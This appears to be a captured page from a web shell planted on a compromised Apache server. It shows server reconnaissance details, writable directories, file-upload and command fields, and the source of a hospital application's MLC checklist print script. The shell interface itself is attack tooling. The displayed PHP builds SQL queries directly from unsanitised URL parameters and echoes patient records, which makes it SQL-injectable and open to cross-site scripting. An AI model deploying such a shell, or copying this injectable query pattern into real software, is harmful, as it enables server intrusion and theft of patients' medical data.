Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.218.74.215
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/print/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/print/Print-MLC-Checklist.php
<div class='col-sm-12'>
	     <?php
     session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');

    include("../dbconnection.php");
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		   	include 'dashboarddocument.php';
}
?>
	  

  <?php

include 'fileheader.php';
?>
						
             	 <?php

      

	    	$sqlpatient2 = "SELECT * FROM site_users WHERE userno='$rpatient[Admitted_Under]'";
	$qsqlpatient2 = mysqli_query($con,$sqlpatient2);
	if($rsn2 = mysqli_fetch_array($qsqlpatient2))
	{
	    echo"
<div class='checkbox'><span style='float: left;'><b>Admission On  :</b> $rpatient[created_at]<br>
<b>Consultant :</b>$rsn2[name]($rpatient[casetype])

</span>

<span style='float: right;'><B>File No.</B> :$rpatient[prescriptionid] <br>";


$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Intial Assessment<br>MLC Checklist<br>Doc.no-'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Intial Assessment<br>MLC Checklist<br>Doc.no-'){
	        echo"<b>Doc.no </b>: $rsp[srno]";

} else{
    echo "";
}
       
	}


echo "</span></div><br>



<br><br>
<div class='checkbox'><span style='float: left;'><b>UHID :</b> $rspi1[patientid]</span><span style='float: right;'><b>Name</b> :$rspi1[patientname]</span></div>
     <br>
     <div class='checkbox'><span style='float: left;'><b>Age:</b> $rspi1[dob]</span><span style='float: right;'><b>SEX :</b>$rspi1[gendor]</span></div>
              <div class='card-body'>
             
      
      ";
	}


	?> 
      <br>   
             
 <div class="panel panel-primary">
               
    <div class="panel-body">
      <h4 class="text-on-pannel text-primary"><strong class="text-uppercase">
   MLC    
 </strong></h4>            
              
               <?php
    $sql ="SELECT * FROM mlc WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo "

 <table width='100%' border='1' class='table table-bordered table-hover' style='width:100%;' border='1'>	
 
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; MLC No : </td>
<td width='50%'>$rs[MLC_No]</td>
</tr>
<tr>

<td width='100%'><img target='_blank' src='../../uploads/$rs[Upload_MLC_Slip]'></td>
</tr>

";
}
?>
</table>

<?php
  	$sql ="SELECT * FROM mlc WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
	    $site_users ="SELECT * FROM site_users WHERE userno='$rs[entered_by]'";
		$qsite_users = mysqli_query($con,$site_users);
		if($rsite_users = mysqli_fetch_array($qsite_users))
		{
		    
		 echo"<h5><b> Created & Updated </b><h5>
		 <table width='100%' border='1' class='table table-bordered table-hover' style='width:100%;' border='1'>
		 <tr><td width=50%><b>By :</b>$rsite_users[name] </b><td width='50%'><b>At :</b> $rsite_users[updated_at] </tr>";   
		    
		}
		}
		?>
		</table>
       
            <div style="page-break-before:always">&nbsp;</div>
			</div>							
										
					</div></div>

Anon7 - 2022
AnonSec Team